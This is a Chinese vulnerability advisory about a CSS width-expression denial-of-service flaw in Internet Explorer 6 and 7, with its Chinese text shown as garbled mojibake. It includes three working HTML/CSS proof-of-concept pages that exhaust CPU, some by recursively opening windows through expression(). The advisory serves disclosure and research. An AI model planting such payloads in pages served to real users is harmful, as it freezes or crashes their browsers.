IE CSS»ûÐοí¶Èµ¥Ôª±ê¼Ç¾Ü¾ø·þÎñ©¶´

Éæ¼°³ÌÐò£º
IE CSS
 
ÃèÊö£º
IE CSS»ûÐοí¶Èµ¥Ôª±ê¼Ç¾Ü¾ø·þÎñ©¶´
 
Ïêϸ£º
Internet ExplorerÊÇ΢Èí·¢²¼µÄ·Ç³£Á÷ÐеÄWEBä¯ÀÀÆ÷¡£

Internet ExplorerÔÚ´¦Àí»ûÐεÄHTML±ê¼Çʱ´æÔÚ©¶´£¬Ô¶³Ì¹¥»÷Õß¿ÉÄÜÀûÓôË©¶´µ¼ÖÂÓû§»úÆ÷²»¿ÉÓá£

Èç¹ûÓû§Ê¹ÓÃIE·ÃÎÊÁËÉèÖÃÓÐÌØÖÆCSS¿í¶Èµ¥ÔªµÄWEBÒ³ÃæµÄ»°£¬¾Í»áµ¼ÖÂiexplore.exeºÄ¾¡100%µÄCPU×ÊÔ´¡£

<*À´Ô´£ºJos¨¦_Carlos_Nieto_Jarqu¨ªn £¨xiam.core@gmail.com£©
 £ £ Andrius Paurys £¨andrius.paurys@gmail.com£©

Á´½Ó£º£¨http://marc.theaimsgroup.com/?l=bugtraq&m=116542162532025&w=2
*>

ÊÜÓ°Ïìϵͳ£º
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 7 Beta 2
Microsoft Internet Explorer 7 Beta 1
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
 
 
¹¥»÷·½·¨£º
¾¯ ¸æ

ÒÔϳÌÐò(·½·¨)¿ÉÄÜ´øÓй¥»÷ÐÔ£¬½ö¹©°²È«Ñо¿Óë½Ìѧ֮Óá£Ê¹ÓÃÕß·çÏÕ×Ô¸º£¡

Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue"> Íø¹Üu¼Òu.bitscn@com
 £ <table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
 £ <tr><td></td></tr>
 £ </table>
</div>


Exploit 2
<div style="width: expression(window.open(self.location));">
 £ 
</div>

Exploit 3
<html>
 £ <head>
 £ £ <title>Another non-standards compliant IE D.O.S.</title>
 £ </head>
 £ <body>
 £ £ <div id="foo" style="height: 20px; border: 1px solid blue">
 £ £ £  <table style="border: 1px solid red; width:
expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');">
 £ £ £  <tr>
 £ £ £ £ £ <td>
 £ £ £ £ £ £ IE makes my life harder :(. It sucks, don't use it :).
 £ £ £ £ £ </td>
 £ £ £  </tr>
 £ £ £  </table>
 £ £ </div>
 £ £ Written by <a href="http://xiam.be">xiam</a>.<br />
 £ £ Tested under IE 6.0.2900.2180
 £ </body>
</html>
 
 
½â¾ö·½°¸£º
³§É̲¹¶¡£º

Microsoft
---------
Ä¿Ç°³§ÉÌ»¹Ã»ÓÐÌṩ²¹¶¡»òÕßÉý¼¶³ÌÐò£¬ÎÒÃǽ¨ÒéʹÓôËÈí¼þµÄÓû§Ëæʱ¹Ø×¢³§É̵ÄÖ÷Ò³ÒÔ»ñÈ¡×îа汾£º

£¨http://www.microsoft.com/windows/ie/default.asp